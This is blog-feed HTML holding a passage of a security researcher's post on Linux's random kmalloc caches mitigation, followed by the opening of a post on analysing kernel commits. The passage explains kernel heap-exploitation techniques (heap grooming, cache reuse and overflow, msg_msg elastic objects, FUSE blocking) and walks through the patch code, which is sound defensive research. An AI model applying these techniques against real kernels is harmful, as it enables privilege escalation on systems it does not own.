Caches" loading="lazy" width="1019" height="299" srcset="https://sam4k.com/content/images/size/w600/2023/10/3_filled_new_slabs.png 600w, https://sam4k.com/content/images/size/w1000/2023/10/3_filled_new_slabs.png 1000w, https://sam4k.com/content/images/2023/10/3_filled_new_slabs.png 1019w" sizes="(min-width: 720px) 720px"></figure><p>Then, from the second batch of allocations into new slabs, we would free every other allocation 
to try and create holes in the new slabs: </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/4_holes.png" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="1019" height="299" srcset="https://sam4k.com/content/images/size/w600/2023/10/4_holes.png 600w, https://sam4k.com/content/images/size/w1000/2023/10/4_holes.png 1000w, https://sam4k.com/content/images/2023/10/4_holes.png 1019w" sizes="(min-width: 720px) 720px"></figure><p>We would then allocate our vulnerable object <code>x</code>, in the hope that we have increased the chances it will be allocated into one of the holes we just created:</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/5_landed.png" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="1019" height="299" srcset="https://sam4k.com/content/images/size/w600/2023/10/5_landed.png 600w, https://sam4k.com/content/images/size/w1000/2023/10/5_landed.png 1000w, https://sam4k.com/content/images/2023/10/5_landed.png 1019w" sizes="(min-width: 720px) 720px"></figure><h4 id="cache-reuseoverflow-attacks">Cache Reuse/Overflow Attacks</h4><p>Remember earlier we mentioned how there are different types of general purpose caches and even private caches, all with their own slabs? What if our vulnerable object is in one cache and we found an object we really, <em>really</em> wanted to corrupt in another cache?</p><p>If we recall our memory allocator fundamentals<sup><a href="https://sam4k.com/linternals-memory-allocators-part-1/">[2]</a></sup>, we know that the page allocator is the fundamental memory allocator for the Linux kernel, with the slab allocator sitting above it. So the slab allocator makes use of the page allocator, including for allocating the chunks of memory used as slabs (to hold cache objects). 
Are you still with me?</p><p>So when all the objects in a slab are freed, the slab itself may in turn be freed back to the page allocator, ready to be reallocated. Can you see where this is going? </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/bill_hader_omg.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="470" height="480"></figure><p>If we have a UAF on an object in a private cache slab, and that slab is then freed and reallocated as a general purpose cache, suddenly our UAF&apos;d memory is pointing to general purpose objects! Our options for corruption have suddenly expanded!</p><p>This kind of technique is known as a &quot;cache reuse&quot; attack and has been documented previously in more detail<a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022"><sup>[3]</sup></a>. By using a similar approach of manipulating the underlying page layout, &quot;cache overflow&quot; attacks are possible too, where you line up slabs from separate caches adjacent to one another in physical memory, which has been used in some great CTF writeups<a href="https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html"><sup>[4]</sup></a>.</p><h4 id="elastic-objects">Elastic Objects</h4><p>Another cornerstone of contemporary heap exploitation is the use of &quot;elastic objects&quot;<sup>[6]</sup>. These are essentially structures with a dynamic size: typically a length field describes the size of a buffer within the same struct.</p><p>Sounds pretty straightforward, right? Why is this relevant? Well, we&apos;ve spoken about the bespoke nature of heap corruption vulnerabilities, and the variety of cache types and sizes. </p><p>Elastic objects can provide generic techniques for exploiting these vulnerabilities, as objects that can be corrupted across a variety of cache sizes due to their elastic nature. 
By generalising the object being corrupted, we can save a lot of the time otherwise spent mining for objects that are corruptible for a certain cache size and then developing a bespoke technique for using that specific corruption to elevate privileges (which can be quite time consuming!). </p><p>A popular elastic object used in contemporary heap corruption exploits is <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/msg.h#L9">struct msg_msg</a></code>, which can be used to leverage an out-of-bounds heap write into arbitrary read/write<sup><a href="https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html">[5]</a></sup>:</p><figure class="kg-card kg-code-card"><pre><code>/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/msg.h#L9">include/linux/msg.h</a> (v6.6)</figcaption></figure><h4 id="fuse">FUSE</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/theresmore.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="270"></figure><p>Seeing as we&apos;re going all out on the exploitation techniques here, I might as well throw in a <em><strong>quick</strong></em> shoutout to FUSE as well, which is commonly used in kernel exploitation.</p><p>Filesystem in Userspace is &quot;an interface for userspace programs to export a filesystem to the Linux kernel.&quot;<sup><a href="https://github.com/libfuse/libfuse">[7]</a></sup>, enabled via <code><a href="https://cateee.net/lkddb/web-lkddb/FUSE_FS.html">CONFIG_FUSE_FS</a>=y</code>. Essentially it allows, often unprivileged, users to define their own filesystems. </p><p>Normally, mounting filesystems is a privileged action and actually defining a filesystem would require you to write kernel code. With FUSE, we can do away with this. By defining the read operations in our FUSE FS, we&apos;re able to define what happens when the kernel tries to read one of our FUSE files, which includes sleeping...</p><p>This gives us the ability to arbitrarily block kernel threads that try to read files in our FUSE FS (essentially accesses to user virtual addresses we can control, as we can map in one of our FUSE files and pass that over to the kernel). </p><p>So what does this have to do with kernel exploitation? Well, as we mentioned previously, a key part of heap exploitation is finding interesting objects to corrupt or control the layout of memory. Ideally we want to be able to allocate and free these on demand; if they&apos;re immediately freed there&apos;s not too much we can do with them ... right?</p><p>Perhaps! 
This is where FUSE comes in: if we have a scenario where an object we <em>really, really </em>want to corrupt is allocated and freed within the same system call, we may be able to keep it in memory if there&apos;s a userspace access we can block on between the allocation and free! You can find more on this, plus some examples, from this <a href="https://duasynt.com/blog/linux-kernel-heap-spray">2018 Duasynt blog post</a>.</p><hr><ol><li><a href="https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst">https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst</a></li><li><a href="https://sam4k.com/linternals-memory-allocators-part-1/">https://sam4k.com/linternals-memory-allocators-part-1/</a></li><li><a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022</a></li><li><a href="https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html">https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html</a></li><li><a href="https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html">https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html</a></li><li>the earliest mention i&apos;m aware of in a kernel xdev context is from the 2020 paper, <a href="https://zplin.me/papers/ELOISE.pdf">&quot;A Systematic Study of Elastic Objects in Kernel Exploitation&quot;</a>, tho i could be wrong </li><li><a href="https://github.com/libfuse/libfuse">https://github.com/libfuse/libfuse</a></li><li><a href="https://duasynt.com/blog/linux-kernel-heap-spray">https://duasynt.com/blog/linux-kernel-heap-spray</a></li></ol><h2 id="introducing-random-kmalloc-caches">Introducing Random Kmalloc Caches</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/startin_simple-1.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" 
height="270"></figure><p>Well, that was quite the background read (sorry not sorry), but we&apos;re hopefully in a good position to dive into this new mitigation: <strong>Random kmalloc caches</strong><sup><a href="https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe">[1]</a></sup>.</p><p>This mitigation affects the generic slab cache implementation. Previously, there was a single generic slab cache for each size &quot;step&quot;: <code>kmalloc-32</code>, <code>kmalloc-64</code>, <code>kmalloc-128</code> etc. Such that a 40 byte object, allocated via <code>kmalloc()</code>, with the correct GFP flags, is always going to end up in the <code>kmalloc-64</code> cache. Straightforward right?</p><p><code>CONFIG_RANDOM_KMALLOC_CACHES=y</code> introduces multiple generic slab caches for each size, 16 by default (named <code>kmalloc-rnd-01-32</code>, <code>kmalloc-rnd-02-32</code> etc.). When an object is allocated via <code>kmalloc()</code>, it is assigned to one of these 16 caches &quot;randomly&quot;, depending on the callsite of the <code>kmalloc()</code> and a per-boot seed.</p><p>Developed by Huawei engineers, this mitigation aims to make exploiting slab heap corruption vulnerabilities more difficult. 
By distributing the available general purpose objects for heap feng shui for any given cache size non-deterministically across up to 16 different caches, it&apos;s harder for an attacker to target specific objects or caches for exploitation.</p><p>If you&apos;re interested in more information, you can also follow the initial discussions over on the Linux kernel mailing list.<sup><a href="https://lore.kernel.org/lkml/20230315095459.186113-1-gongruiqi1@huawei.com/">[2]</a><a href="https://lore.kernel.org/lkml/20230508075507.1720950-1-gongruiqi1@huawei.com/">[3]</a><a href="https://lore.kernel.org/lkml/20230714064422.3305234-1-gongruiqi@huaweicloud.com/#r">[4]</a></sup> </p><hr><ol><li><a href="https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe">https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe</a></li><li><a href="https://lore.kernel.org/lkml/20230315095459.186113-1-gongruiqi1@huawei.com/">[PATCH RFC] Randomized slab caches for kmalloc()</a></li><li><a href="https://lore.kernel.org/lkml/20230508075507.1720950-1-gongruiqi1@huawei.com/">[PATCH RFC v2] Randomized slab caches for kmalloc()</a></li><li><a href="https://lore.kernel.org/lkml/20230714064422.3305234-1-gongruiqi@huaweicloud.com/#r">[PATCH v5] Randomized slab caches for kmalloc()</a></li></ol><h2 id="diving-into-the-implementation">Diving Into The Implementation</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/about_to_get_real_2-1.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="240"></figure><p>The time has come, I&apos;m sure you&apos;ve all been chomping at the bit for the last 2000 words, let&apos;s dig into the implementation for this patch and see what the deal is. 
</p><p>Honestly the implementation for this mitigation is actually pretty straightforward, with only 97 additions and 15 deletions across 7 files, so more than anything it&apos;s going to be a bit of a primer on the parts of the kmalloc API that are affected by this patchset. </p><p>We&apos;ll follow up with a bit of an analysis on the pros and cons of the implementation tho.</p><h3 id="cache-setup">Cache Setup</h3><p>So first things first, let&apos;s touch on how the kmalloc caches are actually created by the kernel and some of the changes needed to include the random cache copies. </p><p>The header additions include configurations for things like the number of cache copies:</p><pre><code class="language-C">+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+#define RANDOM_KMALLOC_CACHES_NR	15 // # of cache copies
+#else
+#define RANDOM_KMALLOC_CACHES_NR	0
+#endif</code></pre><p>The <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363">kmalloc_cache_type</a></code> enum is used to manage the different kmalloc cache types. <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L956">create_kmalloc_caches()</a></code> allocates the initial <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slub_def.h#L98">struct kmem_cache</a></code> objects, which represent the slab caches we&apos;ve been talking about; these are then stored in the exported <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L677">struct kmem_cache *<br>kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HIGH + 1]</a></code> array. As we can see from the definition, the cache type is used as one of the indexes into the array to fetch a cache, while the other is the size index for that cache type (see <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L692">size_index[24]</a></code>).</p><p>With that in mind, an entry for each of the cache copies is added to <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363">enum kmalloc_cache_type</a></code> so that they&apos;re created and fetchable as part of the existing API:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">enum kmalloc_cache_type {
	KMALLOC_NORMAL = 0,
#ifndef CONFIG_ZONE_DMA
	KMALLOC_DMA = KMALLOC_NORMAL,
#endif
#ifndef CONFIG_MEMCG_KMEM
	KMALLOC_CGROUP = KMALLOC_NORMAL,
#endif
+	KMALLOC_RANDOM_START = KMALLOC_NORMAL,
+	KMALLOC_RANDOM_END = KMALLOC_RANDOM_START + RANDOM_KMALLOC_CACHES_NR,
#ifdef CONFIG_SLUB_TINY
	KMALLOC_RECLAIM = KMALLOC_NORMAL,
#else
	KMALLOC_RECLAIM,
#endif
#ifdef CONFIG_ZONE_DMA
	KMALLOC_DMA,
#endif
#ifdef CONFIG_MEMCG_KMEM
	KMALLOC_CGROUP,
#endif
	NR_KMALLOC_TYPES
};
</code></pre><figcaption>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h">include/linux/slab.h</a></figcaption></figure><p>The <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L824">kmalloc_info[]</a></code> is another key data structure in the kmalloc cache initialisation. This array essentially contains a <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab.h#L275">struct kmalloc_info_struct</a></code> for each of the kmalloc &quot;bucket&quot; sizes we&apos;ve talked about. Each element stores the <code>size</code> of the bucket and the <code>name</code> for the various cache types of that size. E.g. <code>kmalloc-rnd-01-64</code> or <code>kmalloc-cg-64</code>.</p><p>This array is then used to pull the correct cache <code>name</code> to pass to <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L661">create_kmalloc_cache()</a></code> given the size index and cache type.</p><p>I&apos;m speeding through this, but you can probably tell already this is going to involve some macros. <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L809">INIT_KMALLOC_INFO(__size, __short_size)</a></code> is used to initialise each of the elements in <code>kmalloc_info[]</code>, with additional macros to initialise each of the <code>name[]</code> elements according to type. </p><p>Below we can see the addition of the kmalloc random caches:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+#define __KMALLOC_RANDOM_CONCAT(a, b) a ## b
+#define KMALLOC_RANDOM_NAME(N, sz) __KMALLOC_RANDOM_CONCAT(KMA_RAND_, N)(sz)
+#define KMA_RAND_1(sz)                  .name[KMALLOC_RANDOM_START +  1] = &quot;kmalloc-rnd-01-&quot; #sz,
+#define KMA_RAND_2(sz)  KMA_RAND_1(sz)  .name[KMALLOC_RANDOM_START +  2] = &quot;kmalloc-rnd-02-&quot; #sz,
+#define KMA_RAND_3(sz)  KMA_RAND_2(sz)  .name[KMALLOC_RANDOM_START +  3] = &quot;kmalloc-rnd-03-&quot; #sz,
+#define KMA_RAND_4(sz)  KMA_RAND_3(sz)  .name[KMALLOC_RANDOM_START +  4] = &quot;kmalloc-rnd-04-&quot; #sz,
+#define KMA_RAND_5(sz)  KMA_RAND_4(sz)  .name[KMALLOC_RANDOM_START +  5] = &quot;kmalloc-rnd-05-&quot; #sz,
+#define KMA_RAND_6(sz)  KMA_RAND_5(sz)  .name[KMALLOC_RANDOM_START +  6] = &quot;kmalloc-rnd-06-&quot; #sz,
+#define KMA_RAND_7(sz)  KMA_RAND_6(sz)  .name[KMALLOC_RANDOM_START +  7] = &quot;kmalloc-rnd-07-&quot; #sz,
+#define KMA_RAND_8(sz)  KMA_RAND_7(sz)  .name[KMALLOC_RANDOM_START +  8] = &quot;kmalloc-rnd-08-&quot; #sz,
+#define KMA_RAND_9(sz)  KMA_RAND_8(sz)  .name[KMALLOC_RANDOM_START +  9] = &quot;kmalloc-rnd-09-&quot; #sz,
+#define KMA_RAND_10(sz) KMA_RAND_9(sz)  .name[KMALLOC_RANDOM_START + 10] = &quot;kmalloc-rnd-10-&quot; #sz,
+#define KMA_RAND_11(sz) KMA_RAND_10(sz) .name[KMALLOC_RANDOM_START + 11] = &quot;kmalloc-rnd-11-&quot; #sz,
+#define KMA_RAND_12(sz) KMA_RAND_11(sz) .name[KMALLOC_RANDOM_START + 12] = &quot;kmalloc-rnd-12-&quot; #sz,
+#define KMA_RAND_13(sz) KMA_RAND_12(sz) .name[KMALLOC_RANDOM_START + 13] = &quot;kmalloc-rnd-13-&quot; #sz,
+#define KMA_RAND_14(sz) KMA_RAND_13(sz) .name[KMALLOC_RANDOM_START + 14] = &quot;kmalloc-rnd-14-&quot; #sz,
+#define KMA_RAND_15(sz) KMA_RAND_14(sz) .name[KMALLOC_RANDOM_START + 15] = &quot;kmalloc-rnd-15-&quot; #sz,
+#else // CONFIG_RANDOM_KMALLOC_CACHES
+#define KMALLOC_RANDOM_NAME(N, sz)
+#endif
+
 #define INIT_KMALLOC_INFO(__size, __short_size)			\
 {								\
 	.name[KMALLOC_NORMAL]  = &quot;kmalloc-&quot; #__short_size,	\
 	KMALLOC_RCL_NAME(__short_size)				\
 	KMALLOC_CGROUP_NAME(__short_size)			\
 	KMALLOC_DMA_NAME(__short_size)				\
+	KMALLOC_RANDOM_NAME(RANDOM_KMALLOC_CACHES_NR, __short_size)	\
 	.size = __size,						\
 }

const struct kmalloc_info_struct kmalloc_info[] __initconst = {
	INIT_KMALLOC_INFO(0, 0),
	INIT_KMALLOC_INFO(96, 96),
	INIT_KMALLOC_INFO(192, 192),
	INIT_KMALLOC_INFO(8, 8),
	INIT_KMALLOC_INFO(16, 16),
	INIT_KMALLOC_INFO(32, 32),
	INIT_KMALLOC_INFO(64, 64),
	INIT_KMALLOC_INFO(128, 128),
	INIT_KMALLOC_INFO(256, 256),
	INIT_KMALLOC_INFO(512, 512),
	INIT_KMALLOC_INFO(1024, 1k),
	INIT_KMALLOC_INFO(2048, 2k),
	INIT_KMALLOC_INFO(4096, 4k),
	INIT_KMALLOC_INFO(8192, 8k),
	INIT_KMALLOC_INFO(16384, 16k),
	INIT_KMALLOC_INFO(32768, 32k),
	INIT_KMALLOC_INFO(65536, 64k),
	INIT_KMALLOC_INFO(131072, 128k),
	INIT_KMALLOC_INFO(262144, 256k),
	INIT_KMALLOC_INFO(524288, 512k),
	INIT_KMALLOC_INFO(1048576, 1M),
	INIT_KMALLOC_INFO(2097152, 2M)
};

</code></pre><figcaption>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L787">mm/slab_common.c</a></figcaption></figure><h3 id="seed-setup">Seed Setup</h3><p>Moving on, we can see how the per-boot seed is generated, which is one of the values used to randomise which cache a particular <code>kmalloc()</code> call site is going to end up in.</p><p>This is initialised during the initial kmalloc cache creation and is stored in the exported symbol <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L398">random_kmalloc_seed</a></code>, as we can see below:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+unsigned long random_kmalloc_seed __ro_after_init;
+EXPORT_SYMBOL(random_kmalloc_seed);
+#endif

...

void __init create_kmalloc_caches(slab_flags_t flags)
{
    ...
+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+	random_kmalloc_seed = get_random_u64();
+#endif
</code></pre><figcaption>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L956">mm/slab_common.c</a></figcaption></figure><p>It&apos;s worth noting here the <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/init.h#L52">__init</a></code> and <code>__ro_after_init</code> annotations. The former is a macro used to tell the kernel this code is only run during initialisation and doesn&apos;t need to hang around in memory after everything&apos;s set up.</p><p><code>__ro_after_init</code> was introduced by Kees Cook back in 2016<sup><a href="https://lwn.net/Articles/676145/">[1]</a></sup> to reduce the writable attack surface in the kernel by moving memory that&apos;s only written to during kernel initialisation to a read-only memory region.</p><h3 id="kmalloc-allocations">Kmalloc Allocations</h3><p>Okay, so we&apos;ve covered how the caches are created and how the seed is initialised. But how are objects then actually allocated to one of these random kmalloc caches?</p><p>As we touched on, the random cache a particular allocation ends up in comes from two factors: the <code>kmalloc()</code> callsite and the per-boot <code>random_kmalloc_seed</code>:</p><figure class="kg-card kg-code-card"><pre><code>+static __always_inline enum kmalloc_cache_type kmalloc_type(gfp_t flags, unsigned long caller)
 {
 	/*
 	 * The most common case is KMALLOC_NORMAL, so test for it
 	 * with a single branch for all the relevant flags.
 	 */
 	if (likely((flags &amp; KMALLOC_NOT_NORMAL_BITS) == 0))
+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+		/* RANDOM_KMALLOC_CACHES_NR (=15) copies + the KMALLOC_NORMAL */
+		return KMALLOC_RANDOM_START + hash_64(caller ^ random_kmalloc_seed,
+						      ilog2(RANDOM_KMALLOC_CACHES_NR + 1));
+#else
 		return KMALLOC_NORMAL;
+#endif</code></pre><figcaption>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L400">include/linux/slab.h</a></figcaption></figure><p>As we can see above, when calculating the kmalloc cache type for an allocation, if the flags are appropriate for the kmalloc random caches, a hash is generated from the two values mentioned and is used to calculate the kmalloc cache type (from the <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363">kmalloc_cache_type</a></code> enum, which has an entry for each of the <code>RANDOM_KMALLOC_CACHES_NR</code> copies), which is then used to fetch the cache from <code>kmalloc_caches[]</code>.</p><figure class="kg-card kg-code-card"><pre><code class="language-c">static __always_inline __alloc_size(1) void *kmalloc(size_t size, gfp_t flags)
{
	if (__builtin_constant_p(size) &amp;&amp; size) {
		unsigned int index;

		if (size &gt; KMALLOC_MAX_CACHE_SIZE)
			return kmalloc_large(size, flags);

 		index = kmalloc_index(size);
 		return kmalloc_trace(
-				kmalloc_caches[kmalloc_type(flags)][index],
+				kmalloc_caches[kmalloc_type(flags, _RET_IP_)][index],
 				flags, size);
 	}
 	return __kmalloc(size, flags);
}</code></pre><figcaption>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L590">include/linux/slab.h</a></figcaption></figure><p>We can see <code>kmalloc()</code> now passes the caller, using the <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/instruction_pointer.h#L7">_RET_IP_</a></code> macro, to <code>kmalloc_type()</code>. This means the <code>unsigned long caller</code> used to generate the hash is the return address for the <code>kmalloc()</code> call. </p><h3 id="thoughts">Thoughts</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/how_do_we_feel-1.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="480"></figure><p>To wrap up the implementation side of things, let&apos;s discuss some of the pros and cons of <code>RANDOM_KMALLOC_CACHES</code>. As the config help text explains, the aim of this hardening feature is to make it &quot;more difficult to spray vulnerable memory objects on the heap for the purpose of exploiting memory vulnerabilities.&quot;<sup><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339">[2]</a></sup>.</p><p>It&apos;s safe to say (I think), that within the context of the current heap exploitation meta and exploring the feature&apos;s implementation, <strong>it does shake up the existing techniques</strong> commonly seen for shaping the heap and exploiting heap vulnerabilities. </p><p>On top of that, it&apos;s a reasonably <strong>lightweight</strong> and <strong>performance friendly</strong> implementation, pretty much exclusively touching the slab allocator implementation.</p><p>It is because of that last point, though, that it is <strong>unable to provide any mitigation against the cache reuse and overflow techniques</strong> mentioned earlier, as these rely on manipulating the underlying page allocator, which isn&apos;t addressed by this patch. 
</p><p>As a result, in certain circumstances you could cause the free of one of these random kmalloc cache slabs containing your vulnerable object and have it reallocated in a more favourable cache. The same could be said for the cache overflow attacks.</p><p>An implementation specific point to note is on the use of the kmalloc return address (for <code>kmalloc()</code>, <code>kmalloc_node()</code>, <code>__kmalloc()</code> etc.) to determine which random kmalloc cache is used. If other parts of the kernel make wrappers around the slab API for their own purposes, such as <code><a href="https://elixir.bootlin.com/linux/v6.6/source/fs/f2fs/f2fs.h#L3379">f2fs_kmalloc()</a></code>, <strong>any objects using that wrapper can share the same <code>_RET_IP_</code></strong> from the slab allocator&apos;s perspective and end up in the same cache.</p><hr><ol><li><a href="https://lwn.net/Articles/676145/">https://lwn.net/Articles/676145/</a></li><li><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339">https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339</a></li></ol><h2 id="whats-the-new-meta">What&apos;s The New Meta?</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/are_we_in_trouble.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="270"></figure><p>Before we put our speculation hats on and start discussing what the new trends and techniques for heap exploitation might look like post <code>RANDOM_KMALLOC_CACHES</code>, it&apos;s worth highlighting that just because it&apos;s <em>in</em> the 6.6 kernel doesn&apos;t mean we&apos;ll see it for a while.</p><p>First of all, the 6.6 kernel is the latest release and it&apos;ll be a while until we see this get sizeable uptake in the real world. 
Secondly, it&apos;s currently an opt-in feature, disabled by default, so it really depends on the distros and vendors to enable this (and we all know that can take a while for security stuff! <em>cough</em> <code>modprobe_path</code>). </p><p>Additionally, there are a couple other mitigations out there that look to mitigate heap exploitation in different ways. This includes grsecurity&apos;s AUTOSLAB<sup><a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">[1]</a></sup> and the experimental mitigations being used on kCTF by Jann Horn and Matteo Rizzo (which I&apos;d love to get into here, perhaps another post?!)<sup><a href="https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README">[2]</a></sup>. These could potentially see more uptake in the long run than <code>RANDOM_KMALLOC_CACHES</code>, or vice versa.</p><p>But <em>if</em> we were interested in tackling heap exploitation in a <code>RANDOM_KMALLOC_CACHES</code> environment, what might it look like? As we mentioned, this implementation focuses on the slab allocator and doesn&apos;t really touch the page allocator. As a result, the kernel is still vulnerable to cache reuse and overflow attacks. </p><p>So perhaps we see a world where &quot;generic techniques&quot; shift to finding new page allocator feng shui primitives, which has had less focus, to streamline the cache reuse/overflow approaches and gain LPE or perhaps to leak the random seed. </p><p>It&apos;s hard to say this early on, and without spending more time on the problem, whether we&apos;d shift into a new norm of generic techniques and approaches for page allocator feng shui as a result of this kind of slab hardening, or whether due to the constraints that&apos;s simply infeasible and the shift will be to more bespoke chains per bug (which could be considered quite a win for hardening&apos;s sake). 
</p><p>That said, I&apos;m sure the same was said about previous hardening features so who knows!</p><hr><ol><li><a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game</a></li><li><a href="https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README">https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README</a></li></ol><h2 id="wrapping-up">Wrapping Up</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/11/did_we_make_it.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="270"></figure><p>Wow, we made it to the end! A 4k word deep dive into a new kernel mitigation certainly is one way to get back into the swing of things, hopefully it made a good read though :) </p><p>We talked about the new kernel mitigation <code>RANDOM_KMALLOC_CACHES</code> and gave some context into the problems it&apos;s trying to address. Loaded with that information we explored the implementation and how that might impact current heap exploitation techniques.</p><p>I would have liked to have spent more time tinkering with the mitigation in anger and perhaps including some demos or experiments, but being realistic about my time and availability, I figured it&apos;d be good to get this out rather than <em>maybe</em> get that out.</p><p>That said, maybe I&apos;ll try writing up some old heap ndays on a <code>RANDOM_KMALLOC_CACHES=y</code> system to try and demonstrate the different approaches required. That sounds quite fun!</p><p>Equally, I quite liked doing a breakdown and review of a new kernel feature, so perhaps I&apos;ll do some more of that going forward (maybe the kCTF experimental mitigations???). </p><p>Anyways, you&apos;ve endured enough of my waffling, thanks for reading! 
As always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Analysing Linux Kernel Commits]]></title><description><![CDATA[Tag along as I talk about a half-finished project, looking at analysing Linux kernel commits for interesting security fixes.]]></description><link>https://sam4k.com/analysing-linux-kernel-commits/</link><guid isPermaLink="false">63de782692020209c38fca22</guid><category><![CDATA[linux]]></category><category><![CDATA[research]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Tue, 07 Feb 2023 20:01:23 GMT</pubDate><media:content url="https://sam4k.com/content/images/2023/02/detective_pik.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2023/02/detective_pik.gif" alt="Analysing Linux Kernel Commits"><p>It&apos;s been a while, hasn&apos;t it? This post is going to be a bit of a change of pace from usual, as it&apos;s actually covering some research from last year that I ended up dropping. </p><p>The plan was to do some analysis of Linux kernel commits, to determine the feasibility of automating the process of finding interesting and potentially exploitable vulnerabilities, hopefully putting a novel poc or two together. </p><p>However, between both IRL circumstances and simply underestimating the time involved, this has dragged on longer than I&apos;d like a blog post to take, and I&apos;m eager to move on to new things. But instead of putting it on the back burner, AKA never to see the light of day again, I thought I&apos;d share the tool I ended up writing and discuss some of the background behind it, as well as my own takeaways from my time working on this stuff. </p><p>So in this post I&apos;ll talk a little about the motivations for looking into this and why kernel security fixes are an interesting topic. 
Then I&apos;ll do a quick tl;dr on Lica (<strong>Li</strong>nux <strong>C</strong>ommit <strong>A</strong>nalyser), the tool I wrote, and share some takeaways.</p><h3 id="disclaimer">Disclaimer</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/01/hold_up.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="270"></figure><p>Before we dive into things, some of the topics and issues I cover in this post are both complex and contentious. I want to highlight that I am by no means an expert on these things, and my thoughts here come from the experiences (and biases) of a security researcher.</p><p>Where there are gaps in my understanding or knowledge, I&apos;ll try to highlight them, and if anyone has any corrections or additional info please let me know, thank you!</p><h2 id="content">Content</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#background">Background</a>
<ul>
